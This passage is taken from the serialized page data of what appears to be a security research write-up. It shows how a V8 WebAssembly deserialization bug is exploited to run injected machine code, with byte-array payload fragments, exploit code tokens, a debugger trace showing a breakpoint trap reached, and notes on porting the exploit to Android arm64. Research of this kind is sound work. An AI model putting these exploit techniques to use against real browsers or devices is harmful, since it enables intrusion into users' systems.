},{"style":466},[141620],{"type":30,"value":584},{"type":24,"tag":301,"props":141622,"children":141623},{"style":359},[141624],{"type":30,"value":377},{"type":24,"tag":301,"props":141626,"children":141627},{"style":466},[141628],{"type":30,"value":584},{"type":24,"tag":301,"props":141630,"children":141631},{"style":359},[141632],{"type":30,"value":377},{"type":24,"tag":301,"props":141634,"children":141635},{"style":466},[141636],{"type":30,"value":9263},{"type":24,"tag":301,"props":141638,"children":141639},{"style":359},[141640],{"type":30,"value":377},{"type":24,"tag":301,"props":141642,"children":141643},{"style":466},[141644],{"type":30,"value":584},{"type":24,"tag":301,"props":141646,"children":141647},{"style":359},[141648],{"type":30,"value":1729},{"type":24,"tag":301,"props":141650,"children":141651},{"class":303,"line":476},[141652,141656,141660,141664,141668,141672,141676,141680,141684,141688,141692,141696,141700,141704,141708,141712,141716,141720,141724,141728,141732,141736,141740,141744,141748,141752,141756,141760,141764,141768,141772,141776,141780,141784,141788,141792,141796,141800,141804,141808,141812,141816,141820,141824,141828,141832,141836,141840,141844,141848,141852,141856,141860,141864,141868,141872,141876,141880,141884,141888,141892,141896],{"type":24,"tag":301,"props":141653,"children":141654},{"style":466},[141655],{"type":30,"value":140869},{"type":24,"tag":301,"props":141657,"children":141658},{"style":359},[141659],{"type":30,"value":377},{"type":24,"tag":301,"props":141661,"children":141662},{"style":466},[141663],{"type":30,"value":584},{"type":24,"tag":301,"props":141665,"children":141666},{"style":359},[141667],{"type":30,"value":377},{"type":24,"tag":301,"props":141669,"children":141670},{"style":466},[141671],{"type":30,"value":9263},{"type":24,"tag":301,"props":141673,"children":141674},{"style":359},[141675],{"type":30,"value":377},{"type":24,"tag":301,"props":141677,"children":141678},{"style":466},[141679],{"type":30,"value":584},{"type":24,"tag":301,"props":141681,"children":141682},{"style":359},[141683],{"type":30,"value":377},{"type":24,"tag":301,"props":141685,"children":141686},{"style":466},[141687],{"type":30,"value":584},{"type":24,"tag":301,"props":141689,"children":141690},{"style":359},[141691],{"type":30,"value":377},{"type":24,"tag":301,"props":141693,"children":141694},{"style":466},[141695],{"type":30,"value":584},{"type":24,"tag":301,"props":141697,"children":141698},{"style":359},[141699],{"type":30,"value":377},{"type":24,"tag":301,"props":141701,"children":141702},{"style":466},[141703],{"type":30,"value":1761},{"type":24,"tag":301,"props":141705,"children":141706},{"style":359},[141707],{"type":30,"value":377},{"type":24,"tag":301,"props":141709,"children":141710},{"style":466},[141711],{"type":30,"value":584},{"type":24,"tag":301,"props":141713,"children":141714},{"style":359},[141715],{"type":30,"value":377},{"type":24,"tag":301,"props":141717,"children":141718},{"style":466},[141719],{"type":30,"value":584},{"type":24,"tag":301,"props":141721,"children":141722},{"style":359},[141723],{"type":30,"value":377},{"type":24,"tag":301,"props":141725,"children":141726},{"style":466},[141727],{"type":30,"value":584},{"type":24,"tag":301,"props":141729,"children":141730},{"style":359},[141731],{"type":30,"value":377},{"type":24,"tag":301,"props":141733,"children":141734},{"style":466},[141735],{"type":30,"value":584},{"type":24,"tag":301,"props":141737,"children":141738},{"style":359},[141739],{"type":30,"value":377},{"type":24,"tag":301,"props":141741,"children":141742},{"style":466},[141743],{"type":30,"value":584},{"type":24,"tag":301,"props":141745,"children":141746},{"style":359},[141747],{"type":30,"value":377},{"type":24,"tag":301,"props":141749,"children":141750},{"style":466},[141751],{"type":30,"value":584},{"type":24,"tag":301,"props":141753,"children":141754},{"style":359},[141755],{"type":30,"value":377},{"type":24,"tag":301,"props":141757,"children":141758},{"style":466},[141759],{"type":30,"value":584},{"type":24,"tag":301,"props":141761,"children":141762},{"style":359},[141763],{"type":30,"value":377},{"type":24,"tag":301,"props":141765,"children":141766},{"style":466},[141767],{"type":30,"value":584},{"type":24,"tag":301,"props":141769,"children":141770},{"style":359},[141771],{"type":30,"value":377},{"type":24,"tag":301,"props":141773,"children":141774},{"style":466},[141775],{"type":30,"value":584},{"type":24,"tag":301,"props":141777,"children":141778},{"style":359},[141779],{"type":30,"value":377},{"type":24,"tag":301,"props":141781,"children":141782},{"style":466},[141783],{"type":30,"value":584},{"type":24,"tag":301,"props":141785,"children":141786},{"style":359},[141787],{"type":30,"value":377},{"type":24,"tag":301,"props":141789,"children":141790},{"style":466},[141791],{"type":30,"value":584},{"type":24,"tag":301,"props":141793,"children":141794},{"style":359},[141795],{"type":30,"value":377},{"type":24,"tag":301,"props":141797,"children":141798},{"style":466},[141799],{"type":30,"value":36179},{"type":24,"tag":301,"props":141801,"children":141802},{"style":359},[141803],{"type":30,"value":377},{"type":24,"tag":301,"props":141805,"children":141806},{"style":466},[141807],{"type":30,"value":584},{"type":24,"tag":301,"props":141809,"children":141810},{"style":359},[141811],{"type":30,"value":377},{"type":24,"tag":301,"props":141813,"children":141814},{"style":466},[141815],{"type":30,"value":584},{"type":24,"tag":301,"props":141817,"children":141818},{"style":359},[141819],{"type":30,"value":377},{"type":24,"tag":301,"props":141821,"children":141822},{"style":466},[141823],{"type":30,"value":584},{"type":24,"tag":301,"props":141825,"children":141826},{"style":359},[141827],{"type":30,"value":377},{"type":24,"tag":301,"props":141829,"children":141830},{"style":466},[141831],{"type":30,"value":584},{"type":24,"tag":301,"props":141833,"children":141834},{"style":359},[141835],{"type":30,"value":377},{"type":24,"tag":301,"props":141837,"children":141838},{"style":466},[141839],{"type":30,"value":584},{"type":24,"tag":301,"props":141841,"children":141842},{"style":359},[141843],{"type":30,"value":377},{"type":24,"tag":301,"props":141845,"children":141846},{"style":466},[141847],{"type":30,"value":584},{"type":24,"tag":301,"props":141849,"children":141850},{"style":359},[141851],{"type":30,"value":377},{"type":24,"tag":301,"props":141853,"children":141854},{"style":466},[141855],{"type":30,"value":584},{"type":24,"tag":301,"props":141857,"children":141858},{"style":359},[141859],{"type":30,"value":377},{"type":24,"tag":301,"props":141861,"children":141862},{"style":466},[141863],{"type":30,"value":584},{"type":24,"tag":301,"props":141865,"children":141866},{"style":359},[141867],{"type":30,"value":377},{"type":24,"tag":301,"props":141869,"children":141870},{"style":466},[141871],{"type":30,"value":584},{"type":24,"tag":301,"props":141873,"children":141874},{"style":359},[141875],{"type":30,"value":377},{"type":24,"tag":301,"props":141877,"children":141878},{"style":466},[141879],{"type":30,"value":584},{"type":24,"tag":301,"props":141881,"children":141882},{"style":359},[141883],{"type":30,"value":377},{"type":24,"tag":301,"props":141885,"children":141886},{"style":466},[141887],{"type":30,"value":584},{"type":24,"tag":301,"props":141889,"children":141890},{"style":359},[141891],{"type":30,"value":377},{"type":24,"tag":301,"props":141893,"children":141894},{"style":466},[141895],{"type":30,"value":584},{"type":24,"tag":301,"props":141897,"children":141898},{"style":359},[141899],{"type":30,"value":1729},{"type":24,"tag":301,"props":141901,"children":141902},{"class":303,"line":495},[141903,141907,141911,141915,141919,141923,141927,141931,141935,141939,141943,141947,141951,141955,141959,141963,141967,141971,141975,141979,141983,141987,141991,141995,141999,142003,142007,142011,142015,142019,142023,142027,142031,142036,142040,142044,142048,142053,142057,142062,142066,142071,142075,142079,142083,142088,142092,142096,142100,142105,142109,142113,142117,142122],{"type":24,"tag":301,"props":141904,"children":141905},{"style":466},[141906],{"type":30,"value":140869},{"type":24,"tag":301,"props":141908,"children":141909},{"style":359},[141910],{"type":30,"value":377},{"type":24,"tag":301,"props":141912,"children":141913},{"style":466},[141914],{"type":30,"value":584},{"type":24,"tag":301,"props":141916,"children":141917},{"style":359},[141918],{"type":30,"value":377},{"type":24,"tag":301,"props":141920,"children":141921},{"style":466},[141922],{"type":30,"value":584},{"type":24,"tag":301,"props":141924,"children":141925},{"style":359},[141926],{"type":30,"value":377},{"type":24,"tag":301,"props":141928,"children":141929},{"style":466},[141930],{"type":30,"value":584},{"type":24,"tag":301,"props":141932,"children":141933},{"style":359},[141934],{"type":30,"value":377},{"type":24,"tag":301,"props":141936,"children":141937},{"style":466},[141938],{"type":30,"value":584},{"type":24,"tag":301,"props":141940,"children":141941},{"style":359},[141942],{"type":30,"value":377},{"type":24,"tag":301,"props":141944,"children":141945},{"style":466},[141946],{"type":30,"value":584},{"type":24,"tag":301,"props":141948,"children":141949},{"style":359},[141950],{"type":30,"value":377},{"type":24,"tag":301,"props":141952,"children":141953},{"style":466},[141954],{"type":30,"value":584},{"type":24,"tag":301,"props":141956,"children":141957},{"style":359},[141958],{"type":30,"value":377},{"type":24,"tag":301,"props":141960,"children":141961},{"style":466},[141962],{"type":30,"value":584},{"type":24,"tag":301,"props":141964,"children":141965},{"style":359},[141966],{"type":30,"value":377},{"type":24,"tag":301,"props":141968,"children":141969},{"style":466},[141970],{"type":30,"value":584},{"type":24,"tag":301,"props":141972,"children":141973},{"style":359},[141974],{"type":30,"value":377},{"type":24,"tag":301,"props":141976,"children":141977},{"style":466},[141978],{"type":30,"value":584},{"type":24,"tag":301,"props":141980,"children":141981},{"style":359},[141982],{"type":30,"value":377},{"type":24,"tag":301,"props":141984,"children":141985},{"style":466},[141986],{"type":30,"value":584},{"type":24,"tag":301,"props":141988,"children":141989},{"style":359},[141990],{"type":30,"value":377},{"type":24,"tag":301,"props":141992,"children":141993},{"style":466},[141994],{"type":30,"value":584},{"type":24,"tag":301,"props":141996,"children":141997},{"style":359},[141998],{"type":30,"value":377},{"type":24,"tag":301,"props":142000,"children":142001},{"style":466},[142002],{"type":30,"value":584},{"type":24,"tag":301,"props":142004,"children":142005},{"style":359},[142006],{"type":30,"value":377},{"type":24,"tag":301,"props":142008,"children":142009},{"style":466},[142010],{"type":30,"value":584},{"type":24,"tag":301,"props":142012,"children":142013},{"style":359},[142014],{"type":30,"value":377},{"type":24,"tag":301,"props":142016,"children":142017},{"style":466},[142018],{"type":30,"value":584},{"type":24,"tag":301,"props":142020,"children":142021},{"style":359},[142022],{"type":30,"value":377},{"type":24,"tag":301,"props":142024,"children":142025},{"style":466},[142026],{"type":30,"value":1503},{"type":24,"tag":301,"props":142028,"children":142029},{"style":359},[142030],{"type":30,"value":377},{"type":24,"tag":301,"props":142032,"children":142033},{"style":466},[142034],{"type":30,"value":142035},"204",{"type":24,"tag":301,"props":142037,"children":142038},{"style":359},[142039],{"type":30,"value":377},{"type":24,"tag":301,"props":142041,"children":142042},{"style":466},[142043],{"type":30,"value":51513},{"type":24,"tag":301,"props":142045,"children":142046},{"style":359},[142047],{"type":30,"value":377},{"type":24,"tag":301,"props":142049,"children":142050},{"style":466},[142051],{"type":30,"value":142052},"137",{"type":24,"tag":301,"props":142054,"children":142055},{"style":359},[142056],{"type":30,"value":377},{"type":24,"tag":301,"props":142058,"children":142059},{"style":466},[142060],{"type":30,"value":142061},"229",{"type":24,"tag":301,"props":142063,"children":142064},{"style":359},[142065],{"type":30,"value":377},{"type":24,"tag":301,"props":142067,"children":142068},{"style":466},[142069],{"type":30,"value":142070},"106",{"type":24,"tag":301,"props":142072,"children":142073},{"style":359},[142074],{"type":30,"value":377},{"type":24,"tag":301,"props":142076,"children":142077},{"style":466},[142078],{"type":30,"value":10900},{"type":24,"tag":301,"props":142080,"children":142081},{"style":359},[142082],{"type":30,"value":377},{"type":24,"tag":301,"props":142084,"children":142085},{"style":466},[142086],{"type":30,"value":142087},"86",{"type":24,"tag":301,"props":142089,"children":142090},{"style":359},[142091],{"type":30,"value":377},{"type":24,"tag":301,"props":142093,"children":142094},{"style":466},[142095],{"type":30,"value":51513},{"type":24,"tag":301,"props":142097,"children":142098},{"style":359},[142099],{"type":30,"value":377},{"type":24,"tag":301,"props":142101,"children":142102},{"style":466},[142103],{"type":30,"value":142104},"139",{"type":24,"tag":301,"props":142106,"children":142107},{"style":359},[142108],{"type":30,"value":377},{"type":24,"tag":301,"props":142110,"children":142111},{"style":466},[142112],{"type":30,"value":142061},{"type":24,"tag":301,"props":142114,"children":142115},{"style":359},[142116],{"type":30,"value":377},{"type":24,"tag":301,"props":142118,"children":142119},{"style":466},[142120],{"type":30,"value":142121},"93",{"type":24,"tag":301,"props":142123,"children":142124},{"style":359},[142125],{"type":30,"value":1729},{"type":24,"tag":301,"props":142127,"children":142128},{"class":303,"line":504},[142129,142134,142138,142142,142146,142150,142154,142158,142162,142166,142170,142174,142178,142182,142186,142190,142194,142198,142202,142206,142210,142214,142218,142222,142226,142230,142234,142238,142242,142246,142250,142254,142258,142262,142266,142270,142274,142278,142282,142286,142290,142294,142298,142302,142306,142310,142314,142318,142322,142326,142330,142334,142338,142342,142346,142350,142354,142358,142362,142366],{"type":24,"tag":301,"props":142130,"children":142131},{"style":466},[142132],{"type":30,"value":142133}," 195",{"type":24,"tag":301,"props":142135,"children":142136},{"style":359},[142137],{"type":30,"value":377},{"type":24,"tag":301,"props":142139,"children":142140},{"style":466},[142141],{"type":30,"value":51042},{"type":24,"tag":301,"props":142143,"children":142144},{"style":359},[142145],{"type":30,"value":377},{"type":24,"tag":301,"props":142147,"children":142148},{"style":466},[142149],{"type":30,"value":66328},{"type":24,"tag":301,"props":142151,"children":142152},{"style":359},[142153],{"type":30,"value":377},{"type":24,"tag":301,"props":142155,"children":142156},{"style":466},[142157],{"type":30,"value":103364},{"type":24,"tag":301,"props":142159,"children":142160},{"style":359},[142161],{"type":30,"value":377},{"type":24,"tag":301,"props":142163,"children":142164},{"style":466},[142165],{"type":30,"value":584},{"type":24,"tag":301,"props":142167,"children":142168},{"style":359},[142169],{"type":30,"value":377},{"type":24,"tag":301,"props":142171,"children":142172},{"style":466},[142173],{"type":30,"value":1761},{"type":24,"tag":301,"props":142175,"children":142176},{"style":359},[142177],{"type":30,"value":377},{"type":24,"tag":301,"props":142179,"children":142180},{"style":466},[142181],{"type":30,"value":584},{"type":24,"tag":301,"props":142183,"children":142184},{"style":359},[142185],{"type":30,"value":377},{"type":24,"tag":301,"props":142187,"children":142188},{"style":466},[142189],{"type":30,"value":584},{"type":24,"tag":301,"props":142191,"children":142192},{"style":359},[142193],{"type":30,"value":377},{"type":24,"tag":301,"props":142195,"children":142196},{"style":466},[142197],{"type":30,"value":584},{"type":24,"tag":301,"props":142199,"children":142200},{"style":359},[142201],{"type":30,"value":377},{"type":24,"tag":301,"props":142203,"children":142204},{"style":466},[142205],{"type":30,"value":584},{"type":24,"tag":301,"props":142207,"children":142208},{"style":359},[142209],{"type":30,"value":377},{"type":24,"tag":301,"props":142211,"children":142212},{"style":466},[142213],{"type":30,"value":584},{"type":24,"tag":301,"props":142215,"children":142216},{"style":359},[142217],{"type":30,"value":377},{"type":24,"tag":301,"props":142219,"children":142220},{"style":466},[142221],{"type":30,"value":584},{"type":24,"tag":301,"props":142223,"children":142224},{"style":359},[142225],{"type":30,"value":377},{"type":24,"tag":301,"props":142227,"children":142228},{"style":466},[142229],{"type":30,"value":584},{"type":24,"tag":301,"props":142231,"children":142232},{"style":359},[142233],{"type":30,"value":377},{"type":24,"tag":301,"props":142235,"children":142236},{"style":466},[142237],{"type":30,"value":584},{"type":24,"tag":301,"props":142239,"children":142240},{"style":359},[142241],{"type":30,"value":377},{"type":24,"tag":301,"props":142243,"children":142244},{"style":466},[142245],{"type":30,"value":1761},{"type":24,"tag":301,"props":142247,"children":142248},{"style":359},[142249],{"type":30,"value":377},{"type":24,"tag":301,"props":142251,"children":142252},{"style":466},[142253],{"type":30,"value":584},{"type":24,"tag":301,"props":142255,"children":142256},{"style":359},[142257],{"type":30,"value":377},{"type":24,"tag":301,"props":142259,"children":142260},{"style":466},[142261],{"type":30,"value":584},{"type":24,"tag":301,"props":142263,"children":142264},{"style":359},[142265],{"type":30,"value":377},{"type":24,"tag":301,"props":142267,"children":142268},{"style":466},[142269],{"type":30,"value":584},{"type":24,"tag":301,"props":142271,"children":142272},{"style":359},[142273],{"type":30,"value":377},{"type":24,"tag":301,"props":142275,"children":142276},{"style":466},[142277],{"type":30,"value":584},{"type":24,"tag":301,"props":142279,"children":142280},{"style":359},[142281],{"type":30,"value":377},{"type":24,"tag":301,"props":142283,"children":142284},{"style":466},[142285],{"type":30,"value":584},{"type":24,"tag":301,"props":142287,"children":142288},{"style":359},[142289],{"type":30,"value":377},{"type":24,"tag":301,"props":142291,"children":142292},{"style":466},[142293],{"type":30,"value":584},{"type":24,"tag":301,"props":142295,"children":142296},{"style":359},[142297],{"type":30,"value":377},{"type":24,"tag":301,"props":142299,"children":142300},{"style":466},[142301],{"type":30,"value":584},{"type":24,"tag":301,"props":142303,"children":142304},{"style":359},[142305],{"type":30,"value":377},{"type":24,"tag":301,"props":142307,"children":142308},{"style":466},[142309],{"type":30,"value":584},{"type":24,"tag":301,"props":142311,"children":142312},{"style":359},[142313],{"type":30,"value":377},{"type":24,"tag":301,"props":142315,"children":142316},{"style":466},[142317],{"type":30,"value":584},{"type":24,"tag":301,"props":142319,"children":142320},{"style":359},[142321],{"type":30,"value":377},{"type":24,"tag":301,"props":142323,"children":142324},{"style":466},[142325],{"type":30,"value":584},{"type":24,"tag":301,"props":142327,"children":142328},{"style":359},[142329],{"type":30,"value":377},{"type":24,"tag":301,"props":142331,"children":142332},{"style":466},[142333],{"type":30,"value":584},{"type":24,"tag":301,"props":142335,"children":142336},{"style":359},[142337],{"type":30,"value":377},{"type":24,"tag":301,"props":142339,"children":142340},{"style":466},[142341],{"type":30,"value":584},{"type":24,"tag":301,"props":142343,"children":142344},{"style":359},[142345],{"type":30,"value":377},{"type":24,"tag":301,"props":142347,"children":142348},{"style":466},[142349],{"type":30,"value":584},{"type":24,"tag":301,"props":142351,"children":142352},{"style":359},[142353],{"type":30,"value":377},{"type":24,"tag":301,"props":142355,"children":142356},{"style":466},[142357],{"type":30,"value":584},{"type":24,"tag":301,"props":142359,"children":142360},{"style":359},[142361],{"type":30,"value":377},{"type":24,"tag":301,"props":142363,"children":142364},{"style":466},[142365],{"type":30,"value":584},{"type":24,"tag":301,"props":142367,"children":142368},{"style":359},[142369],{"type":30,"value":1729},{"type":24,"tag":301,"props":142371,"children":142372},{"class":303,"line":512},[142373,142377,142381,142385,142389,142393,142397,142401,142405,142409,142413,142417,142421,142425,142429,142433,142437,142441,142445,142449,142453,142457,142461,142465,142469,142473,142477,142481,142485,142489,142493,142497,142501,142505,142509,142513,142517,142521,142525,142529,142533,142537,142541,142545,142549,142553,142557,142561,142565,142569,142573,142578,142582,142586],{"type":24,"tag":301,"props":142374,"children":142375},{"style":466},[142376],{"type":30,"value":140869},{"type":24,"tag":301,"props":142378,"children":142379},{"style":359},[142380],{"type":30,"value":377},{"type":24,"tag":301,"props":142382,"children":142383},{"style":466},[142384],{"type":30,"value":584},{"type":24,"tag":301,"props":142386,"children":142387},{"style":359},[142388],{"type":30,"value":377},{"type":24,"tag":301,"props":142390,"children":142391},{"style":466},[142392],{"type":30,"value":584},{"type":24,"tag":301,"props":142394,"children":142395},{"style":359},[142396],{"type":30,"value":377},{"type":24,"tag":301,"props":142398,"children":142399},{"style":466},[142400],{"type":30,"value":584},{"type":24,"tag":301,"props":142402,"children":142403},{"style":359},[142404],{"type":30,"value":377},{"type":24,"tag":301,"props":142406,"children":142407},{"style":466},[142408],{"type":30,"value":584},{"type":24,"tag":301,"props":142410,"children":142411},{"style":359},[142412],{"type":30,"value":377},{"type":24,"tag":301,"props":142414,"children":142415},{"style":466},[142416],{"type":30,"value":584},{"type":24,"tag":301,"props":142418,"children":142419},{"style":359},[142420],{"type":30,"value":377},{"type":24,"tag":301,"props":142422,"children":142423},{"style":466},[142424],{"type":30,"value":584},{"type":24,"tag":301,"props":142426,"children":142427},{"style":359},[142428],{"type":30,"value":377},{"type":24,"tag":301,"props":142430,"children":142431},{"style":466},[142432],{"type":30,"value":584},{"type":24,"tag":301,"props":142434,"children":142435},{"style":359},[142436],{"type":30,"value":377},{"type":24,"tag":301,"props":142438,"children":142439},{"style":466},[142440],{"type":30,"value":584},{"type":24,"tag":301,"props":142442,"children":142443},{"style":359},[142444],{"type":30,"value":377},{"type":24,"tag":301,"props":142446,"children":142447},{"style":466},[142448],{"type":30,"value":584},{"type":24,"tag":301,"props":142450,"children":142451},{"style":359},[142452],{"type":30,"value":377},{"type":24,"tag":301,"props":142454,"children":142455},{"style":466},[142456],{"type":30,"value":584},{"type":24,"tag":301,"props":142458,"children":142459},{"style":359},[142460],{"type":30,"value":377},{"type":24,"tag":301,"props":142462,"children":142463},{"style":466},[142464],{"type":30,"value":584},{"type":24,"tag":301,"props":142466,"children":142467},{"style":359},[142468],{"type":30,"value":377},{"type":24,"tag":301,"props":142470,"children":142471},{"style":466},[142472],{"type":30,"value":584},{"type":24,"tag":301,"props":142474,"children":142475},{"style":359},[142476],{"type":30,"value":377},{"type":24,"tag":301,"props":142478,"children":142479},{"style":466},[142480],{"type":30,"value":584},{"type":24,"tag":301,"props":142482,"children":142483},{"style":359},[142484],{"type":30,"value":377},{"type":24,"tag":301,"props":142486,"children":142487},{"style":466},[142488],{"type":30,"value":584},{"type":24,"tag":301,"props":142490,"children":142491},{"style":359},[142492],{"type":30,"value":377},{"type":24,"tag":301,"props":142494,"children":142495},{"style":466},[142496],{"type":30,"value":584},{"type":24,"tag":301,"props":142498,"children":142499},{"style":359},[142500],{"type":30,"value":377},{"type":24,"tag":301,"props":142502,"children":142503},{"style":466},[142504],{"type":30,"value":584},{"type":24,"tag":301,"props":142506,"children":142507},{"style":359},[142508],{"type":30,"value":377},{"type":24,"tag":301,"props":142510,"children":142511},{"style":466},[142512],{"type":30,"value":584},{"type":24,"tag":301,"props":142514,"children":142515},{"style":359},[142516],{"type":30,"value":377},{"type":24,"tag":301,"props":142518,"children":142519},{"style":466},[142520],{"type":30,"value":584},{"type":24,"tag":301,"props":142522,"children":142523},{"style":359},[142524],{"type":30,"value":377},{"type":24,"tag":301,"props":142526,"children":142527},{"style":466},[142528],{"type":30,"value":584},{"type":24,"tag":301,"props":142530,"children":142531},{"style":359},[142532],{"type":30,"value":377},{"type":24,"tag":301,"props":142534,"children":142535},{"style":466},[142536],{"type":30,"value":584},{"type":24,"tag":301,"props":142538,"children":142539},{"style":359},[142540],{"type":30,"value":377},{"type":24,"tag":301,"props":142542,"children":142543},{"style":466},[142544],{"type":30,"value":584},{"type":24,"tag":301,"props":142546,"children":142547},{"style":359},[142548],{"type":30,"value":377},{"type":24,"tag":301,"props":142550,"children":142551},{"style":466},[142552],{"type":30,"value":584},{"type":24,"tag":301,"props":142554,"children":142555},{"style":359},[142556],{"type":30,"value":377},{"type":24,"tag":301,"props":142558,"children":142559},{"style":466},[142560],{"type":30,"value":36179},{"type":24,"tag":301,"props":142562,"children":142563},{"style":359},[142564],{"type":30,"value":377},{"type":24,"tag":301,"props":142566,"children":142567},{"style":466},[142568],{"type":30,"value":142121},{"type":24,"tag":301,"props":142570,"children":142571},{"style":359},[142572],{"type":30,"value":377},{"type":24,"tag":301,"props":142574,"children":142575},{"style":466},[142576],{"type":30,"value":142577},"198",{"type":24,"tag":301,"props":142579,"children":142580},{"style":359},[142581],{"type":30,"value":377},{"type":24,"tag":301,"props":142583,"children":142584},{"style":466},[142585],{"type":30,"value":584},{"type":24,"tag":301,"props":142587,"children":142588},{"style":359},[142589],{"type":30,"value":1729},{"type":24,"tag":301,"props":142591,"children":142592},{"class":303,"line":592},[142593],{"type":24,"tag":301,"props":142594,"children":142595},{"style":359},[142596],{"type":30,"value":141156},{"type":24,"tag":301,"props":142598,"children":142599},{"class":303,"line":619},[142600,142604,142609,142613,142618,142622,142626,142630,142634,142638,142642],{"type":24,"tag":301,"props":142601,"children":142602},{"style":348},[142603],{"type":30,"value":14671},{"type":24,"tag":301,"props":142605,"children":142606},{"style":369},[142607],{"type":30,"value":142608}," r",{"type":24,"tag":301,"props":142610,"children":142611},{"style":385},[142612],{"type":30,"value":2537},{"type":24,"tag":301,"props":142614,"children":142615},{"style":314},[142616],{"type":30,"value":142617}," bug",{"type":24,"tag":301,"props":142619,"children":142620},{"style":359},[142621],{"type":30,"value":362},{"type":24,"tag":301,"props":142623,"children":142624},{"style":369},[142625],{"type":30,"value":140487},{"type":24,"tag":301,"props":142627,"children":142628},{"style":359},[142629],{"type":30,"value":377},{"type":24,"tag":301,"props":142631,"children":142632},{"style":369},[142633],{"type":30,"value":131828},{"type":24,"tag":301,"props":142635,"children":142636},{"style":359},[142637],{"type":30,"value":206},{"type":24,"tag":301,"props":142639,"children":142640},{"style":369},[142641],{"type":30,"value":131828},{"type":24,"tag":301,"props":142643,"children":142644},{"style":359},[142645],{"type":30,"value":589},{"type":24,"tag":301,"props":142647,"children":142648},{"class":303,"line":635},[142649,142654,142658,142662,142666,142670,142674,142678,142683,142687],{"type":24,"tag":301,"props":142650,"children":142651},{"style":369},[142652],{"type":30,"value":142653}," result",{"type":24,"tag":301,"props":142655,"children":142656},{"style":385},[142657],{"type":30,"value":2537},{"type":24,"tag":301,"props":142659,"children":142660},{"style":359},[142661],{"type":30,"value":873},{"type":24,"tag":301,"props":142663,"children":142664},{"style":308},[142665],{"type":30,"value":39666},{"type":24,"tag":301,"props":142667,"children":142668},{"style":369},[142669],{"type":30,"value":142608},{"type":24,"tag":301,"props":142671,"children":142672},{"style":359},[142673],{"type":30,"value":206},{"type":24,"tag":301,"props":142675,"children":142676},{"style":314},[142677],{"type":30,"value":64283},{"type":24,"tag":301,"props":142679,"children":142680},{"style":359},[142681],{"type":30,"value":142682},"()).",{"type":24,"tag":301,"props":142684,"children":142685},{"style":369},[142686],{"type":30,"value":5958},{"type":24,"tag":301,"props":142688,"children":142689},{"style":359},[142690],{"type":30,"value":492},{"type":24,"tag":301,"props":142692,"children":142693},{"class":303,"line":643},[142694,142698,142703,142707,142711,142715,142719,142723,142727,142731],{"type":24,"tag":301,"props":142695,"children":142696},{"style":348},[142697],{"type":30,"value":42931},{"type":24,"tag":301,"props":142699,"children":142700},{"style":369},[142701],{"type":30,"value":142702}," wasm_instance",{"type":24,"tag":301,"props":142704,"children":142705},{"style":385},[142706],{"type":30,"value":2537},{"type":24,"tag":301,"props":142708,"children":142709},{"style":348},[142710],{"type":30,"value":38685},{"type":24,"tag":301,"props":142712,"children":142713},{"style":369},[142714],{"type":30,"value":140470},{"type":24,"tag":301,"props":142716,"children":142717},{"style":359},[142718],{"type":30,"value":206},{"type":24,"tag":301,"props":142720,"children":142721},{"style":314},[142722],{"type":30,"value":140524},{"type":24,"tag":301,"props":142724,"children":142725},{"style":359},[142726],{"type":30,"value":362},{"type":24,"tag":301,"props":142728,"children":142729},{"style":369},[142730],{"type":30,"value":5599},{"type":24,"tag":301,"props":142732,"children":142733},{"style":359},[142734],{"type":30,"value":589},{"type":24,"tag":301,"props":142736,"children":142737},{"class":303,"line":652},[142738,142742,142746,142750,142754,142758,142762,142766,142770],{"type":24,"tag":301,"props":142739,"children":142740},{"style":348},[142741],{"type":30,"value":42931},{"type":24,"tag":301,"props":142743,"children":142744},{"style":369},[142745],{"type":30,"value":39721},{"type":24,"tag":301,"props":142747,"children":142748},{"style":385},[142749],{"type":30,"value":2537},{"type":24,"tag":301,"props":142751,"children":142752},{"style":369},[142753],{"type":30,"value":142702},{"type":24,"tag":301,"props":142755,"children":142756},{"style":359},[142757],{"type":30,"value":206},{"type":24,"tag":301,"props":142759,"children":142760},{"style":369},[142761],{"type":30,"value":44625},{"type":24,"tag":301,"props":142763,"children":142764},{"style":359},[142765],{"type":30,"value":206},{"type":24,"tag":301,"props":142767,"children":142768},{"style":369},[142769],{"type":30,"value":140573},{"type":24,"tag":301,"props":142771,"children":142772},{"style":359},[142773],{"type":30,"value":492},{"type":24,"tag":301,"props":142775,"children":142776},{"class":303,"line":666},[142777,142782],{"type":24,"tag":301,"props":142778,"children":142779},{"style":314},[142780],{"type":30,"value":142781}," f",{"type":24,"tag":301,"props":142783,"children":142784},{"style":359},[142785],{"type":30,"value":4859},{"type":24,"tag":301,"props":142787,"children":142788},{"class":303,"line":674},[142789],{"type":24,"tag":301,"props":142790,"children":142791},{"style":359},[142792],{"type":30,"value":108681},{"type":24,"tag":32,"props":142794,"children":142795},{},[142796],{"type":30,"value":142797},"Running this in a debugger shows the expected breakpoint:",{"type":24,"tag":291,"props":142799,"children":142801},{"code":142800},"Thread 1 \"d8\" received signal SIGTRAP, Trace/breakpoint trap.\n0x00002ae46bfc1841 in ?? ()\n────────────────────────────────────────────────────────────────────────────\n 0x2ae46bfc183c add BYTE PTR [rax], al\n 0x2ae46bfc183e add BYTE PTR [rax], al\n 0x2ae46bfc1840 int3\n → 0x2ae46bfc1841 mov rbp, rsp\n",[142802],{"type":24,"tag":145,"props":142803,"children":142804},{"__ignoreMap":7},[142805],{"type":30,"value":142800},{"type":24,"tag":80,"props":142807,"children":142809},{"id":142808},"porting-to-android",[142810],{"type":30,"value":142811},"Porting to Android",{"type":24,"tag":32,"props":142813,"children":142814},{},[142815,142817,142822,142824,142829,142831,142836,142838,142844],{"type":30,"value":142816},"The serialized x86-64 code can’t be used on the device because the architecture differs, and ",{"type":24,"tag":145,"props":142818,"children":142820},{"className":142819},[],[142821],{"type":30,"value":139604},{"type":30,"value":142823}," fails. We cross-compiled ",{"type":24,"tag":145,"props":142825,"children":142827},{"className":142826},[],[142828],{"type":30,"value":138763},{"type":30,"value":142830}," for arm64 and serialized the module there, but this still didn’t work on the device and ",{"type":24,"tag":145,"props":142832,"children":142834},{"className":142833},[],[142835],{"type":30,"value":139604},{"type":30,"value":142837}," returned ",{"type":24,"tag":145,"props":142839,"children":142841},{"className":142840},[],[142842],{"type":30,"value":142843},"undefined",{"type":30,"value":206},{"type":24,"tag":32,"props":142846,"children":142847},{},[142848,142850,142855,142857,142862],{"type":30,"value":142849},"Instead, we modified the bytecode to call ",{"type":24,"tag":145,"props":142851,"children":142853},{"className":142852},[],[142854],{"type":30,"value":139630},{"type":30,"value":142856}," directly on the device. The idea is to serialize the code on the device and then feed the resulting bytes back into the original bytecode that calls 